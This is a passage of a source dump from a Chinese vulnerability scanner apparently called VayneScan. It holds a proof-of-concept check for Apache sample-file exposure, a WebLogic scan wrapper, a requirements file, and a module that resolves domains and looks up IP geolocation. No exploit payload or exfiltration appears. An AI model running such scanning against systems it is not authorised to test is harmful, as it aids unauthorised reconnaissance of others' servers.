27 | print(Vcolors.RED + "存在Apache样例文件泄露泄露漏洞,漏洞地址为:" + url + Vcolors.ENDC)
28 | else:
29 | print(Vcolors.OKGREEN + "不存在Apache样例文件泄露漏洞" + Vcolors.ENDC)
--------------------------------------------------------------------------------
/poc/weblogic.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : main.py
4 | @Time : 2019/07/06 01:14:49
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | from app.platform import ManageProcessor
12 | from lib import *
13 |
14 | def weblogicScan(ip,port):
15 | processor = ManageProcessor()
16 | # processed = processor.process(ip,port)
17 | processor.process(ip,port)
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | pyfiglet
2 | dnspython3
3 | bs4
4 | requests
5 | argparse
6 | urllib
7 | random
8 | logging
9 | socket
10 | traceback
11 | getopt
12 | Queue
13 | fake_useragent
14 | threading
--------------------------------------------------------------------------------
/script/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : __init__.py
4 | @Time : 2019/08/02 10:41:12
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | #模块导入界面
12 | from script.getip import ip2domain
13 | from script.getip import ipNew
--------------------------------------------------------------------------------
/script/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/script/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/script/__pycache__/getip.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/script/__pycache__/getip.cpython-37.pyc
--------------------------------------------------------------------------------
/script/getip.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : getip.py
4 | @Time : 2019/07/05 14:53:32
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 | import dns.resolver
12 | from bs4 import BeautifulSoup
13 | import requests
14 | from lib import *
15 | import re
16 |
17 | def ip2domain(ip):
18 | c = re.compile(r'^(((25[0-5]|2[0-4]\d|1\d{2})|([1-9]?\d))\.){3}((25[0-5]|2[0-4]\d|1\d{2})|([1-9]?\d))$')
19 | s = c.search(ip)
20 | if s:
21 | print('\n')
22 | print(Vcolors.OKBLUE + "正在对目标url进行归属地探测~~" + Vcolors.ENDC)
23 | matchIP (ip)
24 | print(Vcolors.OKGREEN + "具体命令请查看 '-h'~~~" + Vcolors.ENDC)
25 | else:
26 | print('\n')
27 | print(Vcolors.OKBLUE + "正在对目标url进行归属地探测~~" + Vcolors.ENDC)
28 | domainToip(ip)
29 |
30 | def ipNew(old_ip):
31 | c = re.compile(r'^(((25[0-5]|2[0-4]\d|1\d{2})|([1-9]?\d))\.){3}((25[0-5]|2[0-4]\d|1\d{2})|([1-9]?\d))$')
32 | s = c.search(old_ip)
33 | if s:
34 | return old_ip
35 | else:
36 | domain = old_ip
37 | data = dns.resolver.query(domain,'A')
38 | for i in data.response.answer:
39 | for j in i.items:
40 | if j.rdtype == 1:
41 | newip = j.address
42 | return newip
43 |
44 | def domainToip(old_ip):
45 | domain = old_ip
46 | data = dns.resolver.query(domain,'A')
47 | for i in data.response.answer:
48 | for j in i.items:
49 | if j.rdtype == 1:
50 | matchIP(j.address)
51 |
52 | def matchIP (new_ip):
53 | url = "http://ip.tool.chinaz.com/"
54 | try:
55 | url = url+str(new_ip)
56 | except:
57 | pass
58 | wbdata = requests.get(url).text
59 | soup = BeautifulSoup(wbdata, 'lxml')
60 | for tag in soup.find_all('span', class_='Whwtdhalf w50-0'):
61 | tag_extractl = tag.get_text().encode('utf-8')
62 | if tag_extractl.find(b"IP\xe7\x9a\x84\xe7\x89\xa9\xe7\x90\x86\xe4\xbd\x8d\xe7\xbd\xae"): #过滤掉【IP的物理位置】这个字符
63 | print(Vcolors.OKGREEN + '被测域名的IP为:' +new_ip+ '\n' +'被测域名的归属地为:'+ tag.get_text() + Vcolors.ENDC)
--------------------------------------------------------------------------------